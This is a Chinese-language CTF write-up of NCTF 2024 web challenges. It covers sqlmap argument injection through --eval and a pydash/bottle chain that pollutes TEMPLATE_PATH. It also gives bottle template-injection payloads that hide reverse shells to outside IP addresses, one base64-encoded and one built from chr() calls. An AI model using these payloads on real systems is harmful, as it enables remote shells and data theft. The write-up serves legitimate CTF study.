NCTF 2024

NCTF2024

WEB

sqlmap-master（sqlmap命令执行漏洞）

from fastapi import FastAPI, Request
from fastapi.responses import FileResponse, StreamingResponse
import subprocess

app = FastAPI()

@app.get("/")
async def index():
    return FileResponse("index.html")

@app.post("/run")
async def run(request: Request):
    data = await request.json()
    url = data.get("url")
    
    if not url:
        return {"error": "URL is required"}
    
    command = f'sqlmap -u {url} --batch --flush-session'

    def generate():
        process = subprocess.Popen(
            command.split(),
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT,
            shell=False
        )
        
        while True:
            output = process.stdout.readline()
            if output == '' and process.poll() is not None:
                break
            if output:
                yield output
    
    return StreamingResponse(generate(), media_type="text/plain")

我们发现有个subprocess.Popen，但因为设置了shell=false，所以导致了无法利用反引号等技巧进行常规的命令注入

在使用 subprocess.Popen 时，shell=False 是默认设置。这意味着传递给 Popen 的命令将不会通过 shell 来执行，而是作为一个直接的可执行文件和参数传递给操作系统。

但是仔细观察可以发现我们还是可以控制sqlmap的参数，即参数注入

我们结合GTFOBins:https://gtfobins.github.io/gtfobins/sqlmap/

通过 –eval 参数可以执⾏ Python 代码, 然后因为上⾯ command.split() 默认是按空格分隔的, 所以需要⼀些⼩技巧来绕过

注意这⾥参数的值不需要加上单双引号, 因为上⾯已经设置了 shell=False , 如果加上去反⽽代表的是 “eval ⼀个 Python 字符串

最终payloiad

127.0.0.1:8000 --eval __import__('os').system('env')

得到flag

ez_dash&ez_dash_revenge(TEMPLATE_PATH链污染)

'''
Hints: Flag在环境变量中
'''


from typing import Optional


import pydash
import bottle



__forbidden_path__=['__annotations__', '__call__', '__class__', '__closure__',
               '__code__', '__defaults__', '__delattr__', '__dict__',
               '__dir__', '__doc__', '__eq__', '__format__',
               '__ge__', '__get__', '__getattribute__',
               '__gt__', '__hash__', '__init__', '__init_subclass__',
               '__kwdefaults__', '__le__', '__lt__', '__module__',
               '__name__', '__ne__', '__new__', '__qualname__',
               '__reduce__', '__reduce_ex__', '__repr__', '__setattr__',
               '__sizeof__', '__str__', '__subclasshook__', '__wrapped__',
               "Optional","func","render",
               ]
__forbidden_name__=[
    "bottle"
]
__forbidden_name__.extend(dir(globals()["__builtins__"]))

def setval(name:str, path:str, value:str)-> Optional[bool]:
    if name.find("__")>=0: return False
    for word in __forbidden_name__:
        if name==word:
            return False
    for word in __forbidden_path__:
        if path.find(word)>=0: return False
    obj=globals()[name]
    try:
        pydash.set_(obj,path,value)
    except:
        return False
    return True

@bottle.post('/setValue')
def set_value():
    name = bottle.request.query.get('name')
    path=bottle.request.json.get('path')
    if not isinstance(path,str):
        return "no"
    if len(name)>6 or len(path)>32:
        return "no"
    value=bottle.request.json.get('value')
    return "yes" if setval(name, path, value) else "no"

@bottle.get('/render')
def render_template():
    path=bottle.request.query.get('path')
    if path.find("{")>=0 or path.find("}")>=0 or path.find(".")>=0:
        return "Hacker"
    return bottle.template(path)
bottle.run(host='0.0.0.0', port=8000)

预期解

我们来看/setValue和/render路由，在理想情况下，render路由只能渲染文件，而不是传入的字符串。但是我们看到

@classmethod
def search(cls, name, lookup=None):
    """ 
    Search name in all directories specified in lookup.
    First without, then with common extensions. Return first hit.
    """
    if not lookup:
        raise depr(0, 12, "Empty template lookup path.", "Configure a template lookup path.")
    
    if os.path.isabs(name):
        raise depr(0, 12, "Use of absolute path for template name.", "Refer to templates with names or paths relative to the lookup path.")
    
    for spath in lookup:
        spath = os.path.abspath(spath) + os.sep
        fname = os.path.abspath(os.path.join(spath, name))
        
        if not fname.startswith(spath): continue
        
        if os.path.isfile(fname): return fname
        
        for ext in cls.extensions:
            if os.path.isfile('%s.%s' % (fname, ext)):
                return '%s.%s' % (fname, ext)

我们最终找到BaseTemplate的search方法，可以看到是没办法使用../../来逃逸的，所以我们需要想办法去修改TEMPLATE_PATH，然后去实现任意文件读取，接下来看setval函数

def setval(name:str, path:str, value:str)-> Optional[bool]:
    if name.find("__")>=0: return False
    for word in __forbidden_name__:
        if name==word:
            return False
    for word in __forbidden_path__:
        if path.find(word)>=0: return False
    obj=globals()[name]
    try:
        pydash.set_(obj,path,value)
    except:
        return False
    return True

结合黑名单和限制袋大概的利用是

setval.__globals__.bottle.TEMPLATE=['../../../../../proc/self/']

但是pydash是不允许去修改__globals__属性的内容的，我们看下代码

def base_set(obj, key, value, allow_override=True):
    """
    Set an object's `key` to `value`. If `obj` is a ``list`` and the `key` is
    the next available index position, append to list; otherwise, pad the list 
    with ``None`` and then append to the list.

    Args:
        obj: Object to assign value to.
        key: Key or index to assign to.
        value: Value to assign.
        allow_override: Whether to allow overriding a previously set key.
    """
    if isinstance(obj, dict):
        if allow_override or key not in obj:
            obj[key] = value
    elif isinstance(obj, list):
        key = int(key)
        if key < len(obj):
            if allow_override:
                obj[key] = value
        else:
            if key > len(obj):
                # Pad list object with None values up to the index key,
                # so we can append the value into the key index.
                obj[:] = (obj + [None] * key)[:key]
            obj.append(value)
    elif (allow_override or not hasattr(obj, key)) and obj is not None:
        _raise_if_restricted_key(key)
        setattr(obj, key, value)

    return obj

def _raise_if_restricted_key(key):
	# Prevent access to restricted keys for security reasons.
	if key in RESTRICTED_KEYS:
		raise KeyError(f"access to restricted key {key!r} is not allowed")

所以可以先利⽤这个setval将RESTRICTED_KEYS修改

/setValue?name=pydash
{"path":"helpers.RESTRICTED_KEYS","value":[]}

然后再去修改

/setValue?name=setval
{"path":"__globals__.bottle.TEMPLATE_PATH","value":["../../../../../proc/self/"]}

然后在/render路由get传参，得到flag

非预期解

在**Bottle** 的默认模板引擎 **SimpleTemplate**，支持类似于 <% 和 %> 的语法来嵌入和执行 Python 代码，所以直接在render路由传参数然后反弹shell即可

payload1

<% from os import system
from base64 import b64encode, b64decode
print(b64decode('YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC82MC4yMDQuMTU4Ljg3LzIzMzMgMD4mMSI=')
%>

payload2

<% getattr(__import__('o'+'s'), 'sy'+'stem')(chr(98)+chr(97)+chr(115)+chr(104)+chr(32)+chr(45)+chr(99)+chr(32)+chr(34)+chr(98)+chr(97)+chr(115)+chr(104)+chr(32)+chr(45)+chr(105)+chr(32)+chr(62)+chr(38)+chr(32)+chr(47)+chr(100)+chr(101)+chr(118)+chr(47)+chr(116)+chr(99)+chr(112)+chr(47)+chr(49)+chr(49)+chr(51)+chr(46)+chr(52)+chr(52)+chr(46)+chr(49)+chr(53)+chr(56)+chr(46)+chr(55)+chr(50)+chr(47)+chr(49)+chr(49)+chr(52)+chr(53)+chr(49)+chr(32)+chr(48)+chr(62)+chr(38)+chr(49)+chr(34)) %>

internal_api（利⽤ HTTP Status Code 进⾏ XSLeaks）

H2 Revenge